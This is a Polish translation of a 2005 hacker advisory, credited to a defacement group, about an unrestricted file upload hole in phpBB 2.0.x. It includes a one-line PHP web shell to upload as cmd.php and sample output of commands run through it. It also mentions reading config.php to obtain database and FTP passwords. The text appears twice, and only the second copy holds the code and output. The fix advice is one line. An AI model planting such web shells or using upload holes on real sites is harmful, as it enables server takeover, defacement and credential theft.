kolejne tłumaczenie bugtraq'u
______________________________________________
Przetłumaczył: DNSA czyli ja chociaz tutaj blokers1990
Autor: Status-x
Kontakt: phr4xz gmail com - status-x hackersoft net
Data: 7 Kwiecień 2005
Strona www: http://defacers.com.mx
Orginalny Link: http://www.defacers.com.mx/advisories/2.txt
Ryzyko: WYSOKIE!!!
Afektowane oprogramowanie: phpBB 2.0.x
Coś dla początkujących:
phpBB jest sławnym systemem napisanym w php używanym przez forum. System jest ostoją dla obrazów, ankiet, prywatnych wiadomości i innego rodzaju czynników wykorzystywanych na stronach www
-= Wrażliwości =-
- | "Bezwzględny upload danych" |
W forach phpbb jest skrypt który umożliwia nam dodanie danych o jakich kolwiek wielkościach z każdym rozrzezeniem.
- | Przykład: |
Możemy stworzyć przykładowy kod który potem dodamy do strony www
Zapisujemy skrypt jako cmd.php, i wchodzimy na strone:
--------------------------
http://adres strony/phpbb/up.php
--------------------------
I dodajemy nasz kod! Wtedy możemy sprawdzić czy nasz kod został dodany:
-----------------------------------
http://adres strony/phpbb/uploads/cmd.php
-----------------------------------
Cmd.php dodany do stronki:
Warning: system(): Cannot execute a blank command in
/home/target/public_html/forum/uploads/tetx.php on line 2
Możemy też wykonać komendy *NIX aby uzyskać nadzwyczajnie zadowalające informacje, które mogłyby zakończyć z okaleczeniem przejętą strone:
-----------------------------------------------------
To jest tylko przykład do czego jest zdolny złośliwy człowiek.
- | "Wyjawienie Haseł" |
Daleki albo lokalny napastnik również może odczytać plik config.php ujawniającym informacje o DB i prawdopodobnym haśle servera FTP.
------------------------------------------------------
Example
-= Jak naprawić? =-
Przefiltruj dozwolone rozrzeżenia dodawanych plików w źródle up.php
[/quote]
______________________________________________
Przetłumaczył: DNSA czyli ja chociaz tutaj blokers1990
Autor: Status-x
Kontakt: phr4xz gmail com - status-x hackersoft net
Data: 7 Kwiecień 2005
Strona www: http://defacers.com.mx
Orginalny Link: http://www.defacers.com.mx/advisories/2.txt
Ryzyko: WYSOKIE!!!
Afektowane oprogramowanie: phpBB 2.0.x
Coś dla początkujących:
phpBB jest sławnym systemem napisanym w php używanym przez forum. System jest ostoją dla obrazów, ankiet, prywatnych wiadomości i innego rodzaju czynników wykorzystywanych na stronach www
-= Wrażliwości =-
- | "Bezwzględny upload danych" |
W forach phpbb jest skrypt który umożliwia nam dodanie danych o jakich kolwiek wielkościach z każdym rozrzezeniem.
- | Przykład: |
Możemy stworzyć przykładowy kod który potem dodamy do strony www
<?
system($cmd)
?>
Zapisujemy skrypt jako cmd.php, i wchodzimy na strone:
--------------------------
http://adres strony/phpbb/up.php
--------------------------
I dodajemy nasz kod! Wtedy możemy sprawdzić czy nasz kod został dodany:
-----------------------------------
http://adres strony/phpbb/uploads/cmd.php
-----------------------------------
Cmd.php dodany do stronki:
Warning: system(): Cannot execute a blank command in
/home/target/public_html/forum/uploads/tetx.php on line 2
Możemy też wykonać komendy *NIX aby uzyskać nadzwyczajnie zadowalające informacje, które mogłyby zakończyć z okaleczeniem przejętą strone:
-----------------------------------------------------
------------------------------------------------------Linux SERVER 2.4.21-4.0.1.ELsmp #1 SMP
Thu Oct 23 01:27:36 EDT 2003 i686 i686 i386 GNU/Linux
/home/target/public_html/forum/uploads
uid=32029(target) gid=530(target) groups=530(target)
To jest tylko przykład do czego jest zdolny złośliwy człowiek.
- | "Wyjawienie Haseł" |
Daleki albo lokalny napastnik również może odczytać plik config.php ujawniającym informacje o DB i prawdopodobnym haśle servera FTP.
------------------------------------------------------
Example
-= Jak naprawić? =-
Przefiltruj dozwolone rozrzeżenia dodawanych plików w źródle up.php
[/quote]